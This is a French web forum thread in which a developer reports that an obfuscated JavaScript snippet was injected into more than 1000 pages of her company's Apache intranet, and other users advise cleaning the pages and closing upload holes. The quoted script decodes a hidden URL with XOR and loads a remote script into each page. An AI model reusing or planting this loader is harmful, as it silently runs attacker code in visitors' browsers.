IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Apache Discussion :

Problème serveur Apache sous Windows XP


Sujet :

Apache

  1. #1
    Candidat au Club
    Femme Profil pro
    Développeur Web
    Inscrit en
    Août 2011
    Messages
    2
    Détails du profil
    Informations personnelles :
    Sexe : Femme
    Localisation : France, Moselle (Lorraine)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : Communication - Médias

    Informations forums :
    Inscription : Août 2011
    Messages : 2
    Points : 3
    Points
    3
    Par défaut Problème serveur Apache sous Windows XP
    Bonjour,

    Il y a 2 ans j'ai installée un serveur Apache sur un PC tournant sous Windows XP (l'OS étant une contrainte imposé par mon employeur... Un linux m'aurait mieux convenu).

    Apache a été couplé avec PHP et MYSQL, en reproduisant les anciennes configurations du serveur linux précédent).
    Le serveur dns ISC Bind est également installé.

    J'ai également installée un pare-feu (KOMODO) et un antivirus (Microsoft Security Essentials).
    Ce serveur héberge notre intranet ainsi que notre espace client.

    Il a fonctionné parfaitement pendant 1 an et demi avant de devenir très lent.
    Ce problème a été résolu depuis mais remplacé par un autre beaucoup plus gênant. Un script js a été collé dans toutes les pages web et empêche le bon fonctionnement des scripts utilisant des sessions. Je ne peux pas supprimer ce script dans toutes les pages car trop nombreuses (>1000).

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    <script>
    function vdch() {
    	if(document.all.length > 3) {
    		var t = new Array('#6a7072', '#723e29', '#2d6562', '#6d7667', '#606863', '#766b72', '#712a65', '#6d2a73', '#692b6c', '#712b00');
    		var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode(parseInt(c_clr,16)^i); } }
    		var dch = document.createElement("script");
    		dch.id = "dchid";
    		dch.src = dchid;
    		document.all[3].appendChild(dch);
    	} else {
    		setTimeout("vdch()",500);
    	}
    } setTimeout("vdch()",500);
    </script>
    Savez d'où vient ce script et comment l'éradiquer et faire que cela ne se reproduise plus ?

    Merci d'avance pour vos réponses.

  2. #2
    Rédacteur
    Avatar de _Mac_
    Profil pro
    Inscrit en
    Août 2005
    Messages
    9 601
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Août 2005
    Messages : 9 601
    Points : 12 977
    Points
    12 977
    Par défaut
    Ton site a été piraté. Je n'expliquerai pas ici le but du script mais clairement, il a été piraté. A mon avis, tu n'as pas le choix :
    1. Nettoie toutes tes pages pour supprimer ce code. Il n'y a rien dans Apache pour supprimer ce code automatiquement et le plus sûr pour te débarrasser de ce code est de le supprimer "physiquement" de toutes tes pages.
    2. Vérifie ton site et assure-toi qu'il n'y a pas moyen de pirater ton site en uploadant un fichier PHP par exemple.

    Du détail, du détail, du détail !!!
    Revenons à la source : lisons la documentation et les fichiers de trace, la réponse à notre problème s'y trouve sans doute

  3. #3
    Invité
    Invité(e)
    Par défaut


    Je te conseille UltraEdit ou jEdit qui te permettent de faire du rechercher/remplacer multi-lignes massif (dans tous les fichiers *.php d'un dossier et de ses sous-dossiers par exemple).

  4. #4
    Candidat au Club
    Femme Profil pro
    Développeur Web
    Inscrit en
    Août 2011
    Messages
    2
    Détails du profil
    Informations personnelles :
    Sexe : Femme
    Localisation : France, Moselle (Lorraine)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : Communication - Médias

    Informations forums :
    Inscription : Août 2011
    Messages : 2
    Points : 3
    Points
    3
    Par défaut
    Merci à vous deux

    J'ai suivie vos conseils et supprimer tout ce code en trop à l'aide du logiciel conseillé.

    Il n'y plus aucune trace de ce script sur le serveur.

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Mono sur Serveur Apache sous Windows
    Par crazyman8 dans le forum Mono
    Réponses: 0
    Dernier message: 30/03/2012, 18h53
  2. Réponses: 3
    Dernier message: 19/05/2009, 16h38
  3. [Configuration] Problème de configuration PHP/apache sous windows
    Par r.jean.maurice1 dans le forum EDI, CMS, Outils, Scripts et API
    Réponses: 1
    Dernier message: 31/07/2006, 15h32

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo